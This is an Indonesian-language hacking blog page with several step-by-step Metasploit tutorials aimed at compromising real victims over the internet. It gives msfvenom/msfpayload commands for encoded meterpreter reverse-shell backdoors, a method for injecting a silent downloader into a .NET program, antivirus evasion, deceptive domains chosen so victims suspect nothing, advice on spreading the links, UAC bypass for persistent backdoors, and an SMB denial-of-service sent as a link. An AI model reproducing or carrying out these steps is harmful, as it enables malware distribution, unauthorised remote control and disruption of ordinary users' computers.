Trojanz
Boy
today : | at : | safemode : ON
> / Home / Facebook / Twitter /
name author perms com modified label
Tampilkan postingan dengan label Metasploit trick. Tampilkan semua postingan
Tampilkan postingan dengan label Metasploit trick. Tampilkan semua postingan

Exploit windows dengan metode .net inzector downloader TrojanzBoy rwxr-xr-x 0 07.17

Filename Exploit windows dengan metode .net inzector downloader
Permission rw-r--r--
Author TrojanzBoy
Date and Time 07.17
Label
Action

OK
tutor kali ini akan memperagakan adegan exploit pada ip public

dengan tehnik manipulasi downloader

ok
disni kita kan bekerja menggunakan 2 os untuk membuat exploit yang jitu

backtrack 5r3
dan windows 7

disini ip public saya (attacker) = 125.164.216.221
dan korban (victim) = 180.247.106.236

untuk melihat ip public bisa cek di

http://www.whatismyip.com/

langkah pertama kita buka dulu


buat dulu listener dari terminal backtrack dengan menggunakan perintah

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 LHOST=125.164.216.221 LPORT=4444 >trojanzboy.exe


ganti ip merah dengan ip public kalian

setelah itu terciptalah sebuah backdoor yang saya beri nama trojanzboy.exe pada directory root

setelah itu pindah hasil backdoor tadi pada directory /var/www


setelah di pindah
sekarang masuk router dan forward ip local kalian pada router
masukkan port 4444 dan 80 untuk listener dan apache 
disini ip local saya 192.168.1.12




setelah router tersetting aktifkan apache
pada menu backtrack >> service >> httpd >> apache start

kalau sudah selesai saatnya membungkus ip public saatnya membuat domain pada http://freedns.afraid.org/ 
kalau belum punya id daftarkan dulu ya

setelah daftar langsung masuk subdomain klik add

setelah selesai save

setelah tersimpan saatnya buka terminal lalu masuk metasploit
msfconsole
dan masukkan exploit multi/handler dan exploit



sekarang copy file backdoor yang telah di buat ada pada /var/www pada OS windows


download tool inzectornya dulu untuk windows --> https://dl.dropboxusercontent.com/s/czq2oph5kxcofpg/Inzector%28By%20trojanzboy.blogspot.com%29.rar?token_hash=AAG_TkjtdSNqmNkzXE_ca1PCNmNv2TJl1qx0mffTPLqXRg&dl=1


lalu ekstrak hasil download
ok buka program inzector lalu klik load dan masukkan program calculator / program .net kalian disini saya contohkan calculator saja lalu open


setelah itu klik
program >> klik 2x main

dan pada menu downloader masukkan alamat domain yang kita buat pada http://freedns.afraid.org/ disini domain saya http://narutoupdate.strangled.net/ dan INGAT nama backdoor yang telah kita copy pada folder /var/www disini backdoor nya saya namakan trojanzboy.exe maka hasil urlnya adalah

http://narutoupdate.strangled.net/trojanzboy.exe 

 dan isi downloader path = hasil downloadnya saya taruh di system32 dan saya beri nama test dan klik inject

dan tentukan letak hasil output




 disini saya beri nama trojanzboycrypted.exe dan saya taruh di desktop



maka file ini siap disebarin ke public
kita scan dengan virustotal



dan jika file trojanzboycrypted.exe ini di jalankan maka program akan mendownload file dari http://narutoupdate.strangled.net/trojanzboy.exe  secara silent otomatis   dan meletakkan exploit pada \windows\system32\test.exe dan program .net calculator pun ikut jalan



dan balik ke backtrack os dan apa yang terjadi sesi meterpreter pun exploit sukses terbuka juga . .  .


program calculator bisa diganti sesuai selera
jangan lupa hasil inject cryptednya di kasih icon biar :mantap

untuk ganti icon bisa gunakan tool icon changer full version-->  https://dl.dropboxusercontent.com/s/ik4h8fhthh471b4/IconChangerfull.rar?token_hash=AAEpLMNx80gcTZ1TZy87yo8PJdTV7uSDWJtE6alXftX8yw&dl=1

Exploit windows dengan Syringe bypass av TrojanzBoy rwxr-xr-x 0 03.49

Filename Exploit windows dengan Syringe bypass av
Permission rw-r--r--
Author TrojanzBoy
Date and Time 03.49
Label
Action

disini saya akan mempraktekkan cara exploit windows dengan syringe inject
pada ip publik biar seru tidak lagi pada local area

ok

langsung saja ya download scriptya di --> https://dl.dropboxusercontent.com/s/stqllmoj3skep0t/syringe%28by%20Trojanzboy.blogspot.com%29.rar?token_hash=AAEP3DPIVH3dBc149VC27UelZCf93Vn6NLPoJtGtWEp-EA&dl=1

lalu ekstrak pada DESKTOP maka terdapat dua file
1. syringe.sh
2. syfile.tar

langsung saja buka terminal dan masuk ke desktop

jangan lupa chomod 777 ya pada file syringe.sh


setelah di chmod buka file syringe.sh dan rubah ip public kalian
ip public saya = 125.164.221.221
ip local saya = 192.168.1.36

cara lihat ip public bisa masuk http://www.whatismyip.com/

edit syringe.sh



setelah di setting saatnya beraksi

balik lagi ke terminal tadi lalu ketikkan perintah
./syringe.sh

dan tunggu hingga payload terbuka dan metasploit run automatic


nah exploit selesai saatnya memforward ip local kita
masuk ke modem router 192.168.1.1
masukkan password anda
kita setting pada router/modem di NAT

jangan lupa masukkan port 80 untuk apache
dan 4444 untuk payload listener

setelah router tersetting aktifkan apache
pada menu backtrack >> service >> httpd >> apache start


kalau sudah selesai saatnya membungkus ip public kita agar tidak telanjang biar korban tidak curiga dengan menggunakan http://freedns.afraid.org/

daftar setelah daftar langsung isi domain anda terserah buat pengecohan korban

setelah selesai save

dns punya saya narutoupdate.strangled.net

sekarang menggabungkan url dengan listener metasploit
disini saya namakan trojanzboy.exe


jadinya http://narutoupdate.strangled.net/trojanzboy.exe

dan saatnya menyebarkan link backdoor anda
tunggu hingga korban masuk dalam link anda dan mendownloadnya


dan session meterpreter pun terbuka


syringe av


Mengatasi upload error core_channel_open: Operation failed: Access is denied pada meterpreter TrojanzBoy rwxr-xr-x 1 21.12

Filename Mengatasi upload error core_channel_open: Operation failed: Access is denied pada meterpreter
Permission rw-r--r--
Author TrojanzBoy
Date and Time 21.12
Label
Action


Disini saya harap kalian sudah masuk sesi meterpreter
dan apa yang kita lakukan setelah dapat sesi meterpreter
banyak cara yang kita lakukan ketika kita berada pada sesi meterpreter ini
hmmm...yup kita akan mengupload backdoor agar kita bisa masuk ke pc korban lagi tanpa mengexploitnya

tapi kendala masih saja ada yaitu tidak bisa upload backdoor kita


dengan keterangan error access denied atau kita ditolak masuk ke system tersebut


DISINI SAYA HARAP KALIAN SUDAH MENDAPATKAN SESSION METERPRETER 1

ok langsung saja kita mencoba masuk systemnya apabila belum di  patch tu windows nya

disini saya harap sudah ada pada meterpreter
lalu ketikkan perintah
getsystem

untuk masuk kesistem

dan coba upload kan lagi backdoor kalian




wow ternyata sukses


lalu kita coba test pada windows 7 yang sudah di patch

DAN JIKA WINDOWS 7 SUDAH DI PATCH alias korban memakai windows 7 sp1
maka ketika kita mau mendapatkan system dengan getsystem maka access denied



dan muncul pesan error pada windows korban
 hmmm ternyata bener bener sudah di patch



disini kita harus sudah masuk meterpreter dulu sebelum membypass nya
dan cara untuk mengakalinya dengan menggunakan tehnik bypass.exe yang ada pada folder /opt/metasploit/msf3/data/post

buka lagi msfconsole
lalu buat exploit multi handler

use exploit/multi/handler
exploit



lalu  bikin payload multi handler dan simpan dengan nama 4444.exe pada desktop




buka terminal  baru masukkan perintah

cd /opt/metasploit/msf3/data/post


disana kita kana melihat bypass nya disini korban menggunakan system 32 bit jadinya saya memilih x86



dan sekarang copy bypass nya pada desktop dan rename nya disini korban menggunakan 32bit dan saya rename bypassnya disini saya rename jadi trokanzboy.exe

cp bypassuac-x86.exe /root/Desktop/trojanzboy.exe



nah hasilnya kita  punya 2 file di desktop
1. Payload multi handler yang kita buat tadi
2. bypass yang barusan kita copy



setelah itu kita cari dulu hasil exploitnya yang mengizinkan kita masuk pada session meterpreter yang dulu
dengan perintah pwd

ternyata exploit kita yang dieksekusi sebelumnya ada di D:

sekarang mulailah kita upload bypass.exe yang telah kita rename tadi di desktop

upload /root/Desktop/trojanzboy.exe D:\


lalu upload juga payload yang telah kita buat sebelumnya

upload /root/Desktop/4444.exe D:\






sekarang kita masuk cmd korban untuk mengesekusinya  menggunkan perintah


shell

lalu eksekusi payload dibawah bypass dengan perintah

trojanzboy.exe elevate /c D:\4444.exe


dan beralihlah pada console kedua (msfconsole yang baru dibuat tadi) dan coba untuk dapatkan systemnya dengan perintah

getsystem

woowwww work
:>

Dos windows 7 pada web browser TrojanzBoy rwxr-xr-x 0 19.34

Filename Dos windows 7 pada web browser
Permission rw-r--r--
Author TrojanzBoy
Date and Time 19.34
Label
Action


Denial Of Service atau sering disingkat dengan DOS adalah salah satu bentuk serangan dalam dunia networking yang bertujuan mematikan pelayanan dari komputer atau jaringan komputer yang diserang

ok pertama kita buka terminal dan mengetikkan perintah
 msfconsole 


untuk membuka metasploit framework




setelah itu kta cara serangan dos dengan mengetikkan perintah
search dos

exploit yang kita gunakan adalah auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop


langsung saja kita mengexploit nya
ketikkan perintahnya

use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
set srvhost 192.168.1.47
exploit

dan kirim kan link yang telah diberikan metasploit pada korban



disini korban menggunakan windows 7 dengan firewall = on



dan korban mengeksekusi pada browser \\192.168.1.47\Shared\Anything


maka korban akan hang dan macet tidak bisa berbuat apa-apa
prosesor korban akan begitu terasa panas karna serangan ini
kalau dibiarkan bisa berakibat fatal maka jalan satu-satunya laptop
harus di restart secara paksa dengan tombol power


wkwkwkwkwk... ...

Hack windows pada ip public (wan) TrojanzBoy rwxr-xr-x 0 09.17

Filename Hack windows pada ip public (wan)
Permission rw-r--r--
Author TrojanzBoy
Date and Time 09.17
Label
Action

kali ini kita coba mengekploitasi windows dari luar jaringan tidak lagi pada local area (LAN)

oke langsung saja ya pentest nya

ingat kita harus memforward ip kita di router / modem

rubah portnya menjadi 4444 ya dan ip localnya diisi dengan ip local kamu
disini ip local ane 192.168.1.74



sekarang buat payloadnya buka terminal ketikkan perintah

msfpayload windows/meterpreter/reverse_tcp LHOST=125.164.216.221 LPORT=4444 x > Desktop/trojanzboy.exe



rubah lhost diatas dengan ip public kalian

untuk melihat ip public bisa cek di http://www.whatismyip.com/







lalu buka metasploit di terminal dengan mengetikkan msfconsole

setelah itu ketikkan perintah exploitnya


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 125.164.216.221 (ip public kalian)
set lport 4444
exploit


kirimkan payload yang telah kita buat tadi dan
tunggu hingga korban mengeksekusi payload yang kita buat tadi


alhasil session pertama telah terbuka




dan berhasil kita sudah mendapatkan session sekarang tinggal terserah kalian mau di apakan korban tersebut

happy pentesting



Mengatasi metasploit error setelah di update TrojanzBoy rwxr-xr-x 0 04.51

Filename Mengatasi metasploit error setelah di update
Permission rw-r--r--
Author TrojanzBoy
Date and Time 04.51
Label
Action
Sudah lama blog ini tidak terurus sekarang admin akan mencoba membangun lagi ini blog wkwkwkwkwk . . . . . .

kali ini saya akan memposting bagaimana cara mengatasi metasploit error setelah di update
 Apabila terjadi error seperti ini
[*] Deprecation Note: After 2013-03-15 (March 15, 2013), Metasploit
[*] source checkouts will NO LONGER update over SVN, but will be using
[*] GitHub exclusively. You should either download a new Metasploit
[*] installer, or use a git clone of Metasploit Framework before
[*] then. You will also need outbound access to github.com on
[*] TCP port 9418 (git), 22 (ssh) or 443 (https), depending on the
[*] protocol used to clone Metasploit Framework (usually, git protocol).
/opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36:in `require': /opt/metasploit/msf3/lib/msf/util/exe.rb:2: syntax error, unexpected tLSHFT (SyntaxError)
<<<<<<< .mine
  ^
    from /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36:in `require'
    from /opt/metasploit/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/msf3/lib/msf/util.rb:23:in `<top (required)>'
    from /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36:in `require'
    from /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36:in `require'
    from /opt/metasploit/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/msf3/lib/msf/core/framework.rb:3:in `<top (required)>'
    from /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36:in `require'
    from /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36:in `require'
    from /opt/metasploit/msf3/lib/fastlib.rb:374:in `require'
    from /opt/metasploit/msf3/lib/msf/core.rb:34:in `<top (required)>'
    from /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/rubygems/custom_require.rb:36:in `require'
    from /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/rubygems/custom_


Langsung ketikkan perintah di bawah ini pada terminal
#cd /opt/metasploit
#rm -rf msf3 
#git clone http://github.com/rapid7/metasploit-framework.git  msf3

dan tunggu hingga prosses selesai
 Lalu langsung deh buka metasploit dannnn


tunggu 2-5 menitan 
violaa . .  . metasploit sudah sembuh lagi


 

2013 ./TrojanzBoy